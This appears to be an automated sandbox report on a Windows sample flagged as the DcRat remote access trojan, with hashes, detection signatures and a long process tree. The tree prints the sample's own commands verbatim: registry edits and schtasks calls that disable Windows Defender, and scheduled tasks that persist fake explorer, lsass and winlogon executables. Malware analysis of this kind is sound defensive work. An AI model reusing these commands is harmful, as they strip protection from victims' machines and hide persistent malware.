Resubmissions

22-07-2024 19:12

240722-xwylbstbjc 10

22-07-2024 19:02

240722-xpxqfssfle 10

Analysis

  • max time kernel
    150s
  • max time network
    82s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags
    arch:x64 arch:x86 image:win10-20240611-en locale:en-us os:windows10-1703-x64 system
  • submitted
    22-07-2024 19:02

General

  • Target

    FunCheker.exe

  • Size

    1.9MB

  • MD5

    a69f81ab8922f56e786c95000e4ea238

  • SHA1

    eec04e5776a155f4445260b46f8fa3b139ccedef

  • SHA256

    c36b87352873121329f10440ce883510be4c7d829d6afe7ee28664b79cddfd8d

  • SHA512

    de9a791be937925f0ab9d665e6282237f78b4b14f11e539bbcb9dd1ee95b0421a00ab841adb97ed3f41d3d92d94a569728edb486940afb690114bf825a42aeab

  • SSDEEP

    49152:mIduhWrW/Si9FPOcS/up3M4vsEVXxQ4mxS5WDK:BuMr6zxSmp8Bi6I

Malware Config

Signatures

  • DcRat 55 IoCs

    DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 22 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 24 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
    "C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4756
    • C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
      "C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
        3⤵
          PID:2256
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
            4⤵
              PID:1476
              • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
                "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4944
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat"
                  6⤵
                    PID:3584
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      7⤵
                        PID:4088
                      • C:\Recovery\WindowsRE\explorer.exe
                        "C:\Recovery\WindowsRE\explorer.exe"
                        7⤵
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4048
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"
                          8⤵
                            PID:4564
                            • C:\Windows\system32\w32tm.exe
                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              9⤵
                                PID:4624
                              • C:\Recovery\WindowsRE\explorer.exe
                                "C:\Recovery\WindowsRE\explorer.exe"
                                9⤵
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4732
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat"
                                  10⤵
                                    PID:4180
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      11⤵
                                        PID:3440
                                      • C:\Recovery\WindowsRE\explorer.exe
                                        "C:\Recovery\WindowsRE\explorer.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3496
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat"
                                          12⤵
                                            PID:2276
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              13⤵
                                                PID:3872
                                              • C:\Recovery\WindowsRE\explorer.exe
                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                13⤵
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3236
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat"
                                                  14⤵
                                                    PID:1284
                                                    • C:\Windows\system32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      15⤵
                                                        PID:4104
                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                        15⤵
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4492
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"
                                                          16⤵
                                                            PID:4560
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              17⤵
                                                                PID:3232
                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                17⤵
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5088
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat"
                                                                  18⤵
                                                                    PID:4036
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      19⤵
                                                                        PID:2076
                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                        19⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4680
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat"
                                                                          20⤵
                                                                            PID:228
                                                                            • C:\Windows\system32\w32tm.exe
                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                              21⤵
                                                                                PID:5040
                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                21⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4392
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat"
                                                                                  22⤵
                                                                                    PID:5072
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      23⤵
                                                                                        PID:5000
                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                        23⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2764
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat"
                                                                                          24⤵
                                                                                            PID:320
                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                              25⤵
                                                                                                PID:2604
                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                25⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4260
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat"
                                                                                                  26⤵
                                                                                                    PID:1516
                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                      27⤵
                                                                                                        PID:4256
                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                        27⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:976
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat"
                                                                                                          28⤵
                                                                                                            PID:2852
                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                              29⤵
                                                                                                                PID:2328
                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                29⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3188
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat"
                                                                                                                  30⤵
                                                                                                                    PID:1284
                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                      31⤵
                                                                                                                        PID:3568
                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                        31⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Modifies registry class
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4452
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat"
                                                                                                                          32⤵
                                                                                                                            PID:1508
                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                              33⤵
                                                                                                                                PID:1416
                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                33⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2700
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat"
                                                                                                                                  34⤵
                                                                                                                                    PID:4932
                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                      35⤵
                                                                                                                                        PID:3196
                                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                        35⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2760
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"
                                                                                                                                          36⤵
                                                                                                                                            PID:200
                                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                              37⤵
                                                                                                                                                PID:1476
                                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                37⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3636
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat"
                                                                                                                                                  38⤵
                                                                                                                                                    PID:3584
                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                      39⤵
                                                                                                                                                        PID:32
                                                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                        39⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5000
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat"
                                                                                                                                                          40⤵
                                                                                                                                                            PID:3136
                                                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                              41⤵
                                                                                                                                                                PID:2764
                                                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                                41⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2952
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"
                                                                                                                                                                  42⤵
                                                                                                                                                                    PID:4732
                                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                      43⤵
                                                                                                                                                                        PID:4708
                                                                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                                        43⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4256
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat"
                                                                                                                                                                          44⤵
                                                                                                                                                                            PID:2468
                                                                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                              45⤵
                                                                                                                                                                                PID:976
                                                                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                                                45⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:5020
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"
                                                                                                                                                                                  46⤵
                                                                                                                                                                                    PID:4656
                                                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                      47⤵
                                                                                                                                                                                        PID:2696
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
                                                                                              2⤵
                                                                                                PID:2280
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
                                                                                                2⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3800
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  3⤵
                                                                                                    PID:2076
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
                                                                                                  2⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3228
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                    3⤵
                                                                                                    • DcRat
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4748
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                    3⤵
                                                                                                      PID:3640
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                      3⤵
                                                                                                        PID:316
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                        3⤵
                                                                                                          PID:208
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:1888
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:2784
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:4676
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:704
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:1844
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                            PID:1652
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                            3⤵
                                                                                                              PID:4948
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                              3⤵
                                                                                                                PID:800
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                3⤵
                                                                                                                  PID:3484
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                  3⤵
                                                                                                                    PID:4688
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                    3⤵
                                                                                                                      PID:5020
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                      3⤵
                                                                                                                        PID:3916
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                        3⤵
                                                                                                                          PID:3396
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                          3⤵
                                                                                                                            PID:2020
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                            3⤵
                                                                                                                              PID:3556
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                              3⤵
                                                                                                                                PID:2088
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                3⤵
                                                                                                                                  PID:3024
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                  3⤵
                                                                                                                                    PID:440
                                                                                                                                  • C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      3⤵
      • Modifies registry class
      PID:4940
    • C:\Windows\system32\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      3⤵
      • Modifies registry class
      PID:2260
    • C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      3⤵
      • Modifies registry class
      PID:4600
    • C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      3⤵
      PID:808
    • C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      3⤵
      PID:2220
    • C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      3⤵
      PID:4176
    • C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      3⤵
      PID:3220
    • C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      3⤵
      • Modifies security service
      PID:4564
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:2928
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3080
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4476
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3332
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3192
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4256
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\lsass.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:672
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:2008
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4856
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3324
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:3872
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:5100
• C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f
  1⤵
  • DcRat
  • Process spawned unexpected child process
  • Scheduled Task/Job: Scheduled Task
  PID:4272
